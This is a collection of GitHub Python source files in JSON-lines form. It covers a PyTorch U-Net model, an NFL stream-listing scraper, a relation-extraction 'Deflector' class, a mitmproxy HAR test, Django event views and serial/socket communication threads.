nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n ) \n \nclass Unet_Resnet(nn.Module):\n def __init__(self):\n super(Unet_Resnet, self).__init__()\n # Input Block\n\n self.conv1 = nn.Conv2d(in_channels=6, out_channels=64, kernel_size=(3, 3), padding=1, bias=False)\n \n \n \n self.enc1 = Resnet_Block(64,64)\n self.enc2 = Resnet_Block(128,128)\n self.enc3 = Resnet_Block(128,128)\n self.enc4 = Resnet_Block(256,256)\n self.enc5 = Resnet_Block(256,256)\n\n self.enc1_down = Downsample(64,128) \n self.enc2_down = Downsample(128,128)\n self.enc3_down = Downsample(128,256)\n self.enc4_down = Downsample(256,256)\n\n self.dec1_1 = final_layer(64,1)\n self.dec1 = Resnet_Block(128,64)\n self.dec2 = Resnet_Block(256,128)\n self.dec3 = Resnet_Block(256,128)\n self.dec4 = Resnet_Block(512,256)\n # self.dec5 = Resnet_Block(128,128)\n\n\n self.dec1_up = Upsample(128,64) \n self.dec2_up = Upsample(128,128)\n self.dec3_up = Upsample(256,128)\n self.dec4_up = Upsample(256,256)\n\n\n self.Mdec1_1 = final_layer(64,1)\n self.Mdec1 = Resnet_Block(128,64)\n self.Mdec2 = Resnet_Block(256,128)\n self.Mdec3 = Resnet_Block(256,128)\n self.Mdec4 = Resnet_Block(512,256)\n # self.Mdec5 = Resnet_Block(128,128)\n\n\n self.Mdec1_up = Upsample(128,64) \n self.Mdec2_up = Upsample(128,128)\n self.Mdec3_up = Upsample(256,128)\n self.Mdec4_up = Upsample(256,256)\n\n self.sigmoid = nn.LogSigmoid()\n self.relu = nn.ReLU()\n\n def forward(self,x):\n\n out1 = self.conv1(x) # o/p 64x64x64\n # print('out1',out1.size())\n en1 = self.enc1(out1) # 64x64x64\n # print('en1',en1.size())\n en1_1 = self.enc1_down(en1) # 128x32x32\n # print('en1_1',en1_1.size())\n en2 = self.enc2(en1_1) # 128x32x32\n # print('en2',en2.size())\n en2_1 = self.enc2_down(en2) # 128x16x16\n # print('en2_1',en2_1.size())\n en3 = self.enc3(en2_1) # 128x16x16\n # print('en3',en3.size())\n en3_1 = self.enc3_down(en3) # 256x8x8\n # print('en3_1',en3_1.size())\n\n en4 = self.enc4(en3_1) # 256x8x8\n # print('en4',en4.size())\n en4_1 = self.enc4_down(en4) # 256x4x4\n # print('en4_1',en4_1.size())\n\n en5 = self.enc5(en4_1) # 512x4x4\n # print('en5',en5.size())\n\n# depth\n de4 = self.dec4_up(en5) # 128x8x8\n # print('de4',de4.size())\n de4_1 = torch.cat((en4,de4 ),1) # 256x8x8\n # print('de4_1',de4_1.size())\n\n de4_1 = self.dec4(de4_1) # 128x8x8\n # print('de4_1',de4_1.size())\n\n de3 = self.dec3_up(de4_1) # 64x16x16\n # print('de3',de3.size())\n de3_1 = torch.cat((en3,de3 ),1) # 128x16x16\n # print('de3_1',de3_1.size())\n\n de3_1 = self.dec3(de3_1) # 64x16x16\n # print('de3_1',de3_1.size())\n \n de2 = self.dec2_up(de3_1) # 64x32x32\n # print('de2',de2.size())\n\n de2_1 = torch.cat((en2,de2 ),1) # 128x32x32\n # print('de2_1',de2_1.size())\n\n de2_1 = self.dec2(de2_1) # 64x32x32\n # print('de2_1',de2_1.size())\n \n de1 = self.dec1_up(de2_1) # 32x64x64\n # print('de1',de1.size())\n de1_1 = torch.cat((en1,de1),1) # 64x64x64\n # print('de1_1',de1_1.size())\n\n de1_1 = self.dec1(de1_1) # 32x64x64\n # print('de1_1',de1_1.size())\n de1_2 = self.dec1_1(de1_1) # 3x64x64\n # print('de1_2',de1_2.size())\n \n\n# mask\n\n Mde4 = self.Mdec4_up(en5) # 128x8x8\n # print('Mde4',Mde4.size())\n Mde4_1 = torch.cat((en4,Mde4 ),1) # 256x8x8\n # print('Mde4_1',Mde4_1.size())\n\n Mde4_1 = self.Mdec4(Mde4_1) # 128x8x8\n # print('Mde4_1',Mde4_1.size())\n\n Mde3 = self.Mdec3_up(Mde4_1) # 64x16x16\n # print('Mde3',Mde3.size())\n Mde3_1 = torch.cat((en3,Mde3 ),1) # 128x16x16\n # print('Mde3_1',Mde3_1.size())\n\n Mde3_1 = self.Mdec3(Mde3_1) # 64x16x16\n # print('Mde3_1',Mde3_1.size())\n \n Mde2 = self.Mdec2_up(Mde3_1) # 64x32x32\n # print('Mde2',Mde2.size())\n\n Mde2_1 = torch.cat((en2,Mde2 ),1) # 128x32x32\n # print('Mde2_1',Mde2_1.size())\n\n Mde2_1 = self.Mdec2(Mde2_1) # 64x32x32\n # print('Mde2_1',Mde2_1.size())\n \n Mde1 = self.Mdec1_up(Mde2_1) # 32x64x64\n # print('Mde1',Mde1.size())\n Mde1_1 = torch.cat((en1,Mde1),1) # 64x64x64\n # print('Mde1_1',Mde1_1.size())\n\n Mde1_1 = self.Mdec1(Mde1_1) # 32x64x64\n # print('Mde1_1',Mde1_1.size())\n Mde1_2 = self.Mdec1_1(Mde1_1) # 3x64x64\n # print('Mde1_2',Mde1_2.size())\n\n\n \n\n return Mde1_2, de1_2 # mask,depth","repo_name":"m-shilpa/machine_learning","sub_path":"deployment/api/predictor/model_architecture.py","file_name":"model_architecture.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3389994772","text":"import re\nfrom sports_streaming import util\nfrom sports_streaming.streamers.models import FootballStreamer\nfrom sports_streaming.streams.models import FootballStream\n\n\nNFL_STREAMER_TABLE = 'https://sportscentral.io/streams-table/{0}/american-football?new-ui=1'\n\ndef get_best_streamer(streams_link):\n return _get_weak_spell(streams_link)\n\n\ndef _get_weak_spell(streams_link):\n game_id = _get_game_id(streams_link)\n streamers = get_streamers(game_id)\n weak_spell = next(\n (streamer for streamer in streamers if streamer.name == 'Weak_Spell'),\n None\n )\n if weak_spell is None:\n raise util.errors.NoWeakSpellFound(game_id=game_id)\n return weak_spell\n\ndef _get_game_id(streams_link):\n pattern = 'streamsMatchId = ([0-9]+);'\n soup = util.soup.get_soup(streams_link)\n scripts = soup.select('script')\n game_id = None\n for script in scripts:\n content = script.string\n if content is None:\n continue\n match = re.search(pattern, content)\n if match is None:\n continue\n game_id = match.group(1)\n break\n if game_id is None:\n raise util.errors.NoGameIdFound(streams_link=streams_link)\n return game_id\n\ndef get_streamers(game_id):\n soup = util.soup.get_soup(NFL_STREAMER_TABLE.format(game_id))\n\n # headers = soup.select_one('#streams table > thead > tr')\n streamers = soup.select('table > tbody > tr')\n streamers = [\n _parse_streamer(streamer, rank)\n for rank, streamer in enumerate(streamers, start=1)\n ]\n if not streamers:\n raise util.errors.NoStreamersFound(game_id=game_id)\n return streamers\n\n\n# td elements within each streamer tr\n# 1 = logo\n# 2 = rank\n# 3 = name\n# 4 = reputation\n# 5 = quality\n# 6 = language\n# 7 = ads\n# 8 = channel\n# 9 = popularity\ndef _parse_streamer(streamer, rank):\n name = streamer.select_one(':nth-child(3)')\n reputation = streamer.select_one(':nth-child(4)')\n quality = streamer.select_one(':nth-child(5)')\n ads = streamer.select_one(':nth-child(7)')\n channel = streamer.select_one(':nth-child(8)')\n popularity = streamer.select_one(':nth-child(9) span.votes-count')\n\n return FootballStreamer(\n util.soup.get_stripped_strings(name)[0],\n FootballStream(streamer.get('data-stream-link')),\n str(rank),\n util.soup.get_stripped_strings(reputation)[0],\n util.soup.get_stripped_strings(quality)[0],\n util.soup.get_stripped_strings(ads)[0],\n util.soup.get_stripped_strings(channel)[0],\n util.soup.get_stripped_strings(popularity)[0]\n )\n","repo_name":"jlemieux/SportsStreaming","sub_path":"back-end/sports_streaming/streamers/football/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27424719754","text":"from tqdm import tqdm\r\nimport numpy as np\r\n\r\n\r\n# Deflector è un meta-sistema per la relation extraction\r\n# che può sfruttare un qualsiasi sistema di link prediction\r\n# per migliorare un qualunque sistema di relaction extraction \r\nclass Deflector:\r\n\r\n # Inizializzazione: \r\n # re_wrapper: è una funzione che può essere definita arbitrariamente\r\n # al suo interno, riceve come input lo stesso input del modello di RE\r\n # ma deve restituire l'input formattato come lista di triple: [(e1, pattern0, e2)] \r\n # e l'output come lista di relazioni: [(pattern0, relation0, (e1, e2))] entrambe della stessa dimensione\r\n # lp_wrapper_fun: è una funzione che può essere definita arbitrariamente\r\n # al suo interno ma deve prendere come input una lista di istanze [(e1, e2)]\r\n # e deve restituire [{set of top relations for e1 e2}]\r\n # PRE: le dimensioni di input ed output devono essere identiche ed associare alle\r\n # le relazioni che non possono essere estratte o predette la stringa 'unknown' \r\n def __init__(self, re_wrapper, lp_wrapper):\r\n self.relation_extraction_model = re_wrapper\r\n self.link_prediction_model = lp_wrapper\r\n self.pattern_black_list = dict() # {pattern: (old_relation, score)}\r\n self.pattern_discovery = dict() # {pattern: (new_relation, score)} # solo per ex relation unknown\r\n\r\n\r\n # Applica i filtri sull'output invece che sull'input\r\n def extract_relations(self, re_input, keep_unknown=False, keep_patterns=False, keep_pairs=False):\r\n \r\n # Input ed Output formattati del modello relation extraction\r\n re_output = self.relation_extraction_model.extract_relations(re_input)\r\n\r\n # Filtra l'output di relation extraction \r\n output = list()\r\n for pattern, relation, pair in re_output:\r\n sbj, obj = pair\r\n if relation != 'unknown':\r\n try:\r\n self.pattern_black_list[pattern]\r\n output.append((pattern, (sbj, 'unknown', obj)))\r\n except:\r\n output.append((pattern, (sbj, relation, obj)))\r\n else:\r\n try:\r\n new_rel = self.pattern_discovery[pattern][0]\r\n output.append((pattern, (sbj, new_rel, obj)))\r\n except:\r\n output.append((pattern, (sbj, relation, obj)))\r\n\r\n # Se si vogliono escludere fatti con relazione 'unknown'\r\n if not keep_unknown:\r\n output = [x for x in output if x[1][1] != 'unknown']\r\n\r\n # Se non si vogliono tenere le coppie anche nell'output\r\n if not keep_pairs:\r\n output = [(x[0], x[1][1]) for x in output]\r\n\r\n # Non tiene traccia del pattern che ha predetto il fatto\r\n if not keep_patterns:\r\n output = [x[1] for x in output] \r\n\r\n return output\r\n\r\n\r\n # Da dizionario: {pattern: (relation, [(subject, object), ...]), ...}\r\n # A dizionario: {(pair): {set predizioni}}\r\n def batch_predict(self, pattern2relpairs, link_predictor, batch_size):\r\n\r\n # Init output structure\r\n all_pairs = set()\r\n print('\\nFinding all unique pairs to be predicted...')\r\n for _, pairs in tqdm(pattern2relpairs.values()):\r\n for pair in pairs:\r\n all_pairs.add(pair)\r\n\r\n # Batch predict\r\n all_pairs = list(all_pairs)\r\n result = list()\r\n print('\\nBatch predicting relations...')\r\n for i in tqdm(range(0, len(all_pairs), batch_size)):\r\n result += zip(all_pairs[i:i+batch_size], link_predictor.predict_links(all_pairs[i:i+batch_size]))\r\n\r\n return dict(result)\r\n\r\n\r\n # Identifica pattern deboli e li aggiunge alla black list\r\n def deflect_patterns(self, re_input, bs=5000, bl_min_len=1, bl_thresh=0.7, pd_min_len=10, pd_thresh=0.7, pd_enabled=False):\r\n\r\n # Traccia le relazioni estratte\r\n ex_trace = self.extract_relations(re_input, keep_unknown=True, keep_patterns=True, keep_pairs=True)\r\n\r\n # Costruisce un dizionario {pattern: (relation, [(subject, object), ...]), ...} (in altre parole: clustering)\r\n pattern2instances = dict()\r\n for pattern, opinion in ex_trace:\r\n try:\r\n sbj, _, obj = opinion\r\n pattern2instances[pattern][1].append((sbj, obj))\r\n except:\r\n sbj, relation, obj = opinion \r\n pattern2instances[pattern] = (relation, [(sbj, obj)])\r\n\r\n # Mantiene una struttura con tutti i pattern noti e le relazioni associate\r\n self.pattern2relation = [(x[0], x[1][0]) for x in pattern2instances.items() if x[1][0] != 'unknown']\r\n\r\n # Build dictionary {pair: predicted relations as a set}\r\n pair2pred = self.batch_predict(pattern2instances, self.link_prediction_model, batch_size=bs)\r\n \r\n self.get_statistics(pattern2instances, pair2pred) # New: this will collect some statistics about clusters\r\n\r\n print('\\nDeflecting patterns...')\r\n for pattern, track in tqdm(pattern2instances.items()):\r\n relation, pairs = track \r\n predictions = [pair2pred[pair] for pair in pairs if 'unknown' not in pair2pred[pair]]\r\n preds_len = len(predictions)\r\n if relation != 'unknown' and preds_len >= bl_min_len:\r\n matches = [relation in pred for pred in predictions] \r\n pattern_score = sum(matches)/len(matches)\r\n # Pattern blacklist\r\n if pattern_score < bl_thresh: \r\n self.pattern_black_list[pattern] = (relation, pattern_score) \r\n elif pd_enabled and preds_len >= pd_min_len:\r\n all_pred_size = [len(pred) for pred in predictions]\r\n rel2weight = dict()\r\n for n, preds in enumerate(predictions):\r\n for rel in preds:\r\n try:\r\n rel2weight[rel] += 1/all_pred_size[n]\r\n except:\r\n rel2weight[rel] = 1/all_pred_size[n]\r\n \r\n max_rel1 = max(rel2weight, key=rel2weight.get)\r\n max_wgh1 = rel2weight[max_rel1]\r\n del(rel2weight[max_rel1])\r\n try: \r\n max_rel2 = max(rel2weight, key=rel2weight.get)\r\n max_wgh2 = rel2weight[max_rel2]\r\n except:\r\n max_wgh2 = 0\r\n\r\n max_rel_score = (max_wgh1 - max_wgh2)/len(pairs)\r\n # Pattern discovery\r\n if max_rel_score >= pd_thresh:\r\n self.pattern_discovery[pattern] = (max_rel1, max_rel_score)\r\n\r\n\r\n # Calcola alcune statistiche sui cluster di coppie associate ad un pattern\r\n def get_statistics(self, pattern2track, pair2pred):\r\n \r\n self.statistics = {'total_clusters': np.int32(0),\r\n 'cluster_sizes': [],\r\n 'unknown_sizes': [],\r\n 'known_sizes': [],\r\n 'unknown_perc': []}\r\n\r\n # Itera per ciascun cluster di coppie relativa ad una \r\n # associazione pattern-relazione appresa da Lector\r\n for _, track in pattern2track.items():\r\n relation, pairs = track\r\n \r\n # Salta i pattern associati a nessuna relazione\r\n if relation == 'unknown':\r\n continue \r\n\r\n predictions = [pair2pred[pair] for pair in pairs]\r\n cluster_size = len(predictions)\r\n unknown_size = len([p for p in predictions if 'unknown' in p])\r\n\r\n self.statistics['total_clusters'] += 1\r\n self.statistics['cluster_sizes'].append(cluster_size)\r\n self.statistics['unknown_sizes'].append(unknown_size)\r\n self.statistics['known_sizes'].append(cluster_size - unknown_size)\r\n self.statistics['unknown_perc'].append(unknown_size/cluster_size)\r\n \r\n\r\n # Aggrega risultati\r\n\r\n # Statistiche sulle dimensioni dei cluster\r\n for name in ['cluster', 'unknown', 'known']:\r\n self.statistics[f'mean_{name}_size'] = np.mean(self.statistics[f'{name}_sizes'])\r\n self.statistics[f'max_{name}_size'] = np.max(self.statistics[f'{name}_sizes'])\r\n self.statistics[f'min_{name}_size'] = np.min(self.statistics[f'{name}_sizes'])\r\n self.statistics[f'std_{name}_size'] = np.std(self.statistics[f'{name}_sizes'])\r\n # Percentuale media e deviazione standard del contenuto di 'unknown' prediction in un cluster\r\n if name == 'unknown':\r\n self.statistics[f'mean_{name}_perc'] = np.mean(self.statistics[f'{name}_perc'])\r\n self.statistics[f'std_{name}_perc'] = np.std(self.statistics[f'{name}_perc'])\r\n\r\n # Cluster contenenti solo unknown (LP non conosce almeno una delle due entità in predizione)\r\n self.statistics['unknown_clusters'] = np.int32(0)\r\n for n, size in enumerate(self.statistics['cluster_sizes']):\r\n if size == self.statistics['unknown_sizes'][n]:\r\n self.statistics['unknown_clusters'] += 1\r\n\r\n # Rimozione chiavi associate a liste di valori\r\n del(self.statistics['cluster_sizes'])\r\n del(self.statistics['unknown_sizes'])\r\n del(self.statistics['known_sizes'])\r\n del(self.statistics['unknown_perc'])\r\n \r\n\r\n \r\n\r\n \r\n","repo_name":"3rr4t1c/deflector-knowledge-antani","sub_path":"deflector.py","file_name":"deflector.py","file_ext":"py","file_size_in_byte":9562,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20725640590","text":"import json\nfrom pathlib import Path\n\nimport pytest\nfrom readhar import ReadHar\n\nfrom mitmproxy import exceptions\nfrom mitmproxy import types\nfrom mitmproxy.tools.web.app import flow_to_json\n\nhere = Path(__file__).parent.absolute()\n\n\ndef hardcode_variable_fields_for_tests(flow: dict) -> None:\n flow[\"id\"] = \"hardcoded_for_test\"\n flow[\"timestamp_created\"] = 0\n flow[\"server_conn\"][\"id\"] = \"hardcoded_for_test\"\n flow[\"client_conn\"][\"id\"] = \"hardcoded_for_test\"\n\n\ndef file_to_flows(path_name: Path) -> list[dict]:\n r = ReadHar()\n with open(path_name, \"rb\") as f:\n file_json = json.load(f)[\"log\"][\"entries\"]\n flows = []\n\n for entry in file_json:\n expected = r.request_to_flow(entry)\n flow_json = flow_to_json(expected)\n hardcode_variable_fields_for_tests(flow_json)\n flows.append(flow_json)\n\n return flows\n\n\ndef test_corrupt():\n r = ReadHar()\n\n pytest.raises(\n exceptions.CommandError, r.read_har, types.Path(\"./corrupted/brokenfile.har\")\n )\n with open(\"./corrupted/broken_headers.json\") as f:\n file_json = json.load(f)\n pytest.raises(exceptions.OptionsError, r.fix_headers, file_json[\"headers\"])\n\n\n@pytest.mark.parametrize(\n \"har_file\", [pytest.param(x, id=x.stem) for x in here.glob(\"har_files/*.har\")]\n)\ndef test_har_to_flow(har_file: Path):\n expected_file = har_file.with_suffix(\".json\")\n\n expected_flows = json.loads(expected_file.read_bytes())\n actual_flows = file_to_flows(har_file)\n\n for expected, actual in zip(expected_flows, actual_flows):\n actual = json.loads(json.dumps(actual))\n\n assert actual == expected\n\n\nif __name__ == \"__main__\":\n for path_name in here.glob(\"har_files/*.har\"):\n print(path_name)\n\n flows = file_to_flows(path_name)\n\n with open(f\"har_files/{path_name.stem}.json\", \"w\") as f:\n json.dump(flows, f, indent=4)\n","repo_name":"xufuhai/mitmproxy","sub_path":"examples/contrib/import_har/test_readhar.py","file_name":"test_readhar.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"19876953734","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required, user_passes_test\n\nfrom notifications.models import *\nfrom threading import Timer\n\nfrom authentication.forms import organizerForm\nfrom functools import wraps\nfrom django.contrib import messages\nfrom authentication.models import User, Organizer\nfrom .forms import *\nfrom .models import *\nimport os \nfrom django.shortcuts import (\n HttpResponseRedirect,\n get_object_or_404,\n get_list_or_404,\n redirect,\n render,\n)\nfrom django.conf import settings\n\n@login_required\ndef createEventView(request):\n categories = Categories.objects.all()\n\n if request.method == \"POST\":\n form = createEventForm(request.POST)\n \n\n if form.is_valid():\n print('ffffffffffffffffffffffffffffffffffffff',request.POST)\n user = User.objects.get(username=request.user.username)\n event = form.save(commit=False)\n event.organizer = user\n event.save()\n # event = Events.objects.create(\n # organizer = user,\n # eventName = request.POST[\"eventName\"],\n # eventDescription = request.POST[\"eventDescription\"],\n # payment = request.POST[\"payment\"],\n # eventCategories = request.POST[\"eventCategories\"],\n # eventStartDate = request.POST[\"eventStartDate\"],\n # eventEndDate = request.POST[\"eventEndDate\"],\n # eventStartTime = request.POST[\"eventStartTime\"],\n # eventEndTime = request.POST[\"eventEndTime\"],\n # eventType = request.POST[\"eventType\"],\n # venue = request.POST[\"venue\"],\n # eventCity = request.POST[\"eventCity\"],\n\n # )\n if event:\n messages.success(request, f\"Event created successfully.\",extra_tags=\"success\")\n return redirect('events-list')\n else:\n messages.error(request, f\"Internal error occured! Try again in a few.\",extra_tags=\"danger\")\n\n else:\n context={\n \"form\":form,\n \"categories\": categories,\n }\n return render(request, 'events/create_event.html',context)\n else:\n form = createEventForm()\n context = {\n \"categories\": categories,\n \"form\":form,\n }\n return render(request, 'events/create_event.html',context)\n\n\n\n@login_required\ndef eventsListView(request):\n\n try:\n events = Events.objects.filter(organizer=request.user.id).order_by('-date_added')\n context ={\n 'events':events,\n }\n\n except Exception as e:\n messages.error(request, f\"Error occured while fetching data from database\", extra_tags='danger')\n return redirect('organizer-home')\n\n return render(request, 'events/events_list.html',context)\n\n\n\n\n@login_required\ndef eventPublish(request,id):\n obj = get_object_or_404(Events, id=id)\n obj.is_published = True\n user = User.objects.filter(id=obj.organizer)\n if user.totalEvents:\n user.totalEvents += 1\n else:\n user.totalEvents = 1\n \n obj.save()\n messages.success(request, f'Event has been published!', extra_tags=\"success\")\n return eventPreview(request,id)\n\n return render(request, 'events/events_list.html',context)\n\n\n\n@login_required\ndef cancelEvent(request,id):\n obj = get_object_or_404(Events, id=id)\n if obj.soldTickets > 0:\n messages.error(request, \"You cannot cancel an event with sold tickets!\",extra_tags=\"danger\")\n return eventPreview(request,id)\n else:\n obj.delete()\n messages.success(request, f'Event has been deleted!', extra_tags=\"success\")\n return redirect('events-list')\n\n\n\n\n\n\n@login_required\n# @organizerIsSetup\ndef eventsDetailView(request, id):\n obj = get_object_or_404(Events, id=id)\n dire = Events.objects.filter(organizer=request.user.id)\n org = get_object_or_404(Organizer, organizer=request.user.id)\n img = Images.objects.filter(event=obj.id)\n if request.POST and request.POST.get(\"add-image\", None):\n url = request.get_full_path()\n newUrl = url.split('/')\n urlID = int(newUrl[len(newUrl)-1])\n addEventImages(request,urlID)\n return redirect('event-details', id)\n if request.POST and request.POST.get(\"updateImage\", None):\n url = request.get_full_path()\n newUrl = url.split('/')\n urlID = int(newUrl[len(newUrl)-1])\n updateEventImage(request,urlID)\n return redirect('event-details', id)\n if request.POST and request.POST.get(\"deleteImage\", None):\n url = request.get_full_path()\n newUrl = url.split('/')\n urlID = int(newUrl[len(newUrl)-1])\n deleteEventImage(request,urlID)\n return redirect('event-details', id)\n if img:\n first = img[0].image\n else:\n first =None\n if obj in dire:\n form = updateEventForm(request.POST or None,request.FILES or None, instance=obj)\n # form2 = ImagesForm(request.POST or None, instance=img)\n if request.method==\"POST\":\n\n if form.is_valid():\n event = form.save(commit=False)\n user = User.objects.get(username=request.user.username)\n event.organizer=user\n event.save()\n messages.success(request, f'The Event has been updated!',extra_tags=\"success\")\n url = request.get_full_path()\n # this = url.replace('update', '')\n return redirect('event-details',obj.id)\n urlB4 = request.get_full_path()\n urlB4 = urlB4.split('/')\n url = urlB4[len(urlB4)-1]\n context = {\n 'form': form,\n 'img':img,\n 'first':first,\n 'url':url,\n }\n return render(request, \"events/events_detail.html\", context)\n else:\n messages.warning(\n request, f'You have no authorization to access or edit other events!',extra_tags=\"warning\")\n return redirect ('events-list')\n\n\n\n\ndef addEventImages(request,newUrl):\n try: \n images = request.FILES.getlist('eventImages')\n event = Events.objects.get(id=newUrl)\n for image in images:\n if image.size > 15728640 :\n messages.error(request,\"Maximum allowed size for image is 15MB.\",extra_tags=\"danger\")\n return redirect('event-details' ,newUrl)\n\n \n reversedName = image.name [::-1]\n extension = reversedName.split('.')[0]\n ext = extension[::-1]\n\n if not ext in settings.IMAGE_EXT:\n messages.error(request,\"File type not supported! Please upload only: .jpg, .jpeg, .png format files.\",extra_tags=\"danger\")\n return redirect('event-details' ,newUrl) \n Images.objects.create(\n event = event,\n image = image\n )\n messages.success(request, \"Images added successfully!\", extra_tags=\"success\")\n except Exception as e:\n messages.error(request, \"Error occured during your upload. Make sure file format is of PNG, JPEG, or JPG\",extra_tags=\"danger\")\n return redirect('event-details' ,newUrl)\n\n\n\n\n\n\n\ndef updateEventImage(request,newUrl):\n try: \n image = request.FILES['updatedEventImage']\n id = request.POST['id']\n before = Images.objects.get(id=id)\n\n\n if image.size > 15728640 :\n messages.error(request,\"Maximum allowed size for image is 15MB.\",extra_tags=\"danger\")\n return redirect('event-details' ,newUrl)\n\n reversedName = image.name [::-1]\n extension = reversedName.split('.')[0]\n ext = extension[::-1]\n\n print(\"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\", image.size)\n\n if not ext in settings.IMAGE_EXT:\n messages.error(request,\"File type not supported! Please upload only: .jpg, .jpeg, .png format files.\",extra_tags=\"danger\")\n return redirect('event-details' ,newUrl)\n\n os.remove(before.image.path)\n before.image = request.FILES['updatedEventImage']\n before.save()\n messages.success(request, \"Images updated successfully!\", extra_tags=\"success\")\n except Exception as e:\n messages.error(request, \"Error occured during your upload. Make sure file format is of PNG, JPEG, or JPG\",extra_tags=\"danger\")\n return redirect('event-details' ,newUrl)\n\n\n\n\n\ndef deleteEventImage(request, newUrl):\n id = request.POST['id']\n obj = get_object_or_404(Images, id = id)\n if obj:\n obj.delete()\n messages.success(request, f'Image has been deleted!', extra_tags=\"success\")\n return redirect('event-details' ,newUrl)\n else:\n return redirect('event-details' ,newUrl)\n\n\n\n\n\n\n\n\n\ndef eventPreview(request, id):\n obj = get_object_or_404(Events, id=id)\n dire = Events.objects.filter(organizer=request.user.id)\n if obj in dire:\n try:\n images = Images.objects.filter(event=obj.id)\n first = images[0].image\n print(\"sssssssssssssssssssssss\", first)\n context={\n \"event\" : obj,\n \"images\" : images,\n \"first\": first,\n }\n except:\n messages.error(request, f\"Your event needs atleast one Image! You can add multiple\", extra_tags=\"danger\")\n return redirect('event-details', id)\n\n\n return render(request, \"events/events_preview.html\", context)","repo_name":"natibogale/eventTray_api","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"425461438","text":"# -*- coding: utf-8 -*-\r\n#/usr/bin/python\r\nimport sys\r\nimport glob\r\nimport serial\r\nimport threading\r\nimport queue\r\nimport socket\r\nimport serial\r\nfrom enum import Enum\r\nimport io\r\n\r\nclass ConnectionType(Enum):\r\n RS232 = 0\r\n SOCKET = 1\r\n\r\nclass SerialThread(threading.Thread):\r\n \"\"\"Return the pathname of the KOS root directory.\"\"\"\r\n def __init__(self, queue, ser=None):\r\n threading.Thread.__init__(self)\r\n self.ser = ser\r\n self.queue = queue\r\n self._stopevent = threading.Event()\r\n print(\"Thread\")\r\n\r\n def find_serial():\r\n \"\"\"\r\n Find all available COM ports connected to current system\r\n \"\"\"\r\n if sys.platform.startswith('win'):\r\n ports = ['COM%s' % (i + 1) for i in range(50)]\r\n elif sys.platform.startswith('linux') \\\r\n or sys.platform.startswith('cygwin'):\r\n # this excludes your current terminal \"/dev/tty\"\r\n ports = glob.glob('/dev/tty[A-Za-z]*')\r\n elif sys.platform.startswith('darwin'):\r\n ports = glob.glob('/dev/tty.*')\r\n else:\r\n raise EnvironmentError('Unsupported platform')\r\n\r\n result = []\r\n for port in ports:\r\n try: # exception if not available\r\n s = serial.Serial(port)\r\n s.close()\r\n result.append(port)\r\n except (OSError, serial.SerialException):\r\n pass\r\n return result\r\n\r\n def connect(self, ser):\r\n try:\r\n print(\"Connecting \" + str(ser['port']))\r\n self.conn = serial.Serial(ser['port'], ser['baudrate'],\r\n bytesize=8, parity='N', stopbits=1,timeout=0.1)\r\n print(self.conn)\r\n self.sio = io.TextIOWrapper(io.BufferedRWPair(self.conn, self.conn, 1),\r\n newline = '\\r')\r\n self.sio._CHUNK_SIZE = 1\r\n return False\r\n except Exception as e:\r\n raise e from None\r\n\r\n def write(self, data):\r\n self.data = data +\"\\r\"\r\n\r\n def read(self):\r\n res = self.conn.readline()\r\n self.conn.flush()\r\n return res\r\n\r\n def run(self):\r\n while True:\r\n try:\r\n if self.conn.inWaiting():\r\n text = self.sio.readlines()\r\n print(text)\r\n for line in text:\r\n if line and line.find('\\x03') == -1:\r\n self.queue.put(line.strip())\r\n\r\n if self.data:\r\n self.conn.write(self.data.encode())\r\n self.data=None\r\n #self.sio.flush()\r\n except:\r\n pass\r\n\r\nclass SocketThread(threading.Thread):\r\n def __init__(self, queue, sock=None):\r\n threading.Thread.__init__(self)\r\n self.data=None\r\n self.queue = queue\r\n self.conn = sock\r\n\r\n def connect(self, dev_socket):\r\n s = None\r\n print(\"Connecting to socket '{}'\".format(dev_socket))\r\n for res in socket.getaddrinfo(dev_socket['ip'], dev_socket['port'],\r\n socket.AF_UNSPEC, socket.SOCK_STREAM):\r\n af, socktype, proto, canonname, sa = res\r\n try:\r\n s = socket.socket(af, socktype, proto)\r\n except OSError as msg:\r\n s = None\r\n continue\r\n try:\r\n s.settimeout(1)\r\n s.connect(sa)\r\n except OSError as msg:\r\n s.close()\r\n s = None\r\n continue\r\n self.conn = s\r\n break\r\n print(self.conn)\r\n return s\r\n\r\n def write(self, data):\r\n try:\r\n self.data = data\r\n except Exception as e:\r\n raise e\r\n\r\n def read(self, bytes=1024):\r\n if self.conn:\r\n data = self.conn.recvfrom(bytes)\r\n return data[0]\r\n else:\r\n return None\r\n\r\n def run(self):\r\n while True:\r\n try:\r\n if self.data:\r\n print(self.data)\r\n self.conn.send(self.data.encode())\r\n data_in = self.read()\r\n if data_in:\r\n self.queue.put(data_in.decode())\r\n except socket.timeout:\r\n pass\r\n except ValueError:\r\n self.queue.put(\"Out of range\")\r\n except:\r\n pass\r\n","repo_name":"Holks/serDev","sub_path":"modules/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73295282603","text":"# -*- coding: utf-8 -*-\n# @Author: Haozhe Xie\n# @Date: 2020-04-09 11:30:26\n# @Last Modified by: Haozhe Xie\n# @Last Modified time: 2020-11-05 15:03:15\n# @Email: cshzxie@gmail.com\n\nimport logging\nimport os\nimport torch\n\nimport utils.data_loaders\nimport utils.helpers\n\nfrom tqdm import tqdm\n\nfrom models.rmnet import RMNet\nfrom models.tiny_flownet import TinyFlowNet\n\n\ndef inference_net(cfg):\n # Set up data loader\n 